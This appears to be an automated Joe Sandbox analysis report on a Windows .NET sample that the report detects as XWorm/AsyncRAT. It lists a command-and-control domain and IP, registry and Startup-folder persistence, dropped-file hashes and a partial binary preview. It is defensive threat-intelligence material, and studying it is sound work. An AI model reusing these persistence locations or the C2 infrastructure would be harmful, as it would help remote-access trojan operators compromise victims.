              NameMaliciousAntivirus DetectionReputation
              below-communist.gl.at.ply.ggtrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.mpowershell.exe, 00000005.00000002.2333487305.00000204CD186000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.micpowershell.exe, 00000008.00000002.2490281197.00000160F79A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.micpowershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.micft.cMicRosofpowershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                147.185.221.24
                                                		below-communist.gl.at.ply.ggUnited States
                                                		12087SALSGIVERUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579065
                                                Start date and time:2024-12-20 18:59:05 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:19
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PjGz899RZV.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@17/17@1/1
                                                EGA Information:
                                                • Successful, ratio: 12.5%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 74
                                                • Number of non-executed functions: 8
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 1612 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 1864 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 3052 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 3404 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 1924 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2720 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7160 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: PjGz899RZV.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                13:00:02API Interceptor42x Sleep call for process: powershell.exe modified
                                                13:00:43API Interceptor1598313x Sleep call for process: PjGz899RZV.exe modified
                                                19:00:38Task SchedulerRun new task: PjGz899RZV path: C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                19:00:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PjGz899RZV C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                19:00:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PjGz899RZV C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                19:00:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                147.185.221.24ehxF3rusxJ.exeGet hashmaliciousXWormBrowse
                                                  Client-built-Playit.exeGet hashmaliciousQuasarBrowse
                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                      72OWK7wBVH.exeGet hashmaliciousXWormBrowse
                                                        aZDwfEKorn.exeGet hashmaliciousXWormBrowse
                                                          HdTSntLSMB.exeGet hashmaliciousXWormBrowse
                                                            file.exeGet hashmaliciousXWormBrowse
                                                              file.exeGet hashmaliciousXWormBrowse
                                                                NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                                  a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    SALSGIVERUSehxF3rusxJ.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.24
                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 147.184.134.130
                                                                    Client-built-Playit.exeGet hashmaliciousQuasarBrowse
                                                                    • 147.185.221.24
                                                                    PowerRat.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 147.185.221.211
                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                    • 147.185.221.24
                                                                    msedge.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.22
                                                                    imagelogger.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.229
                                                                    NJRAT DANGEROUS.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.181
                                                                    com surrogate.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.22
                                                                    lastest.exeGet hashmaliciousNjratBrowse
                                                                    • 147.185.221.20

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PjGz899RZV.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\PjGz899RZV.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):654
                                                                    Entropy (8bit):5.380476433908377
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................

                                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):41
                                                                    Entropy (8bit):3.7195394315431693
                                                                    Encrypted:false
                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                    Malicious:false
                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04qc5b3a.day.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33ln350j.3kw.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1fpbqjx.1s2.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akg2qz2r.fwd.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chl5uxwu.v5c.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbkss24s.nkz.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2ceestu.x5d.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzhjiaal.hno.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3rb5vcb.shi.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcvcf5n0.cwb.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vijn0xk1.jkt.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wv0anctj.xwt.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:00:37 2024, mtime=Fri Dec 20 17:00:39 2024, atime=Fri Dec 20 17:00:39 2024, length=38400, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):784
                                                                    Entropy (8bit):5.101836606825283
                                                                    Encrypted:false
                                                                    SSDEEP:12:8BC+4gApnu8Ch6ilXIsY//ztbjLJpAyoODtYjAn+HPEOLfbSRbymV:8BcgoDJilXU7tJuy5yAnCBfImm
                                                                    MD5:20214D4BEDE61AF9FF145373F8D786C3
                                                                    SHA1:3D1C75E3500A1F6C68F13D2CE06675E4307AF984
                                                                    SHA-256:C3B1B4F0448CA686AE838CD5C66A2667CC579DD6E34081E34E82A8F6EA9B199E
                                                                    SHA-512:FB0F80342716691B6E126B5692FAEFC6D306A6D0A879650C4D46A9096E8F95ACC4322516AFA2C3A997508DBDD85ED0CB708E91B3FD2DFF3EB236EAAFF68A87F6
                                                                    Malicious:false
                                                                    Preview:L..................F.... ...X....S..b(...S..b(...S..........................~.:..DG..Yr?.D..U..k0.&...&.......$..S....X...S.......S......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y|............................^.A.p.p.D.a.t.a...B.V.1......Yz...Roaming.@......EW<2.Yz...../.....................T\..R.o.a.m.i.n.g.....j.2......Y.. .PJGZ89~1.EXE..N......Y...Y..............................^.P.j.G.z.8.9.9.R.Z.V...e.x.e......._...............-.......^............B.8.....C:\Users\user\AppData\Roaming\PjGz899RZV.exe........\.....\.....\.....\.....\.P.j.G.z.8.9.9.R.Z.V...e.x.e.`.......X.......284330...........hT..CrF.f4... ..*.K.....-...-$..hT..CrF.f4... ..*.K.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                    C:\Users\user\AppData\Roaming\PjGz899RZV.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.546989998450206
                                                                    Encrypted:false
                                                                    SSDEEP:768:xLyB8NkqoKs4LB8ejyAEM5FWPh9rF67OwhP9JIkH:x01qof4L2EFK9rF67OwRPR
                                                                    MD5:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    SHA1:CE5C3D508AC86A431619F84D2D10FF149479E8BF
                                                                    SHA-256:53DB4FA18CD42CDB875538B91C6F500F22727BE4CD1D0E0A618159462A8B76BA
                                                                    SHA-512:08211849BE5047245A3327C89F1F952CBE9B870BACD72FBFF6E4DDD69D762E88B68BE044DDCEC53B8781DA9267358939002337990EEC542BEFD334F733ED4AF3
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg............................n.... ........@.. ....................................@................................. ...K.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........V...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.546989998450206
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
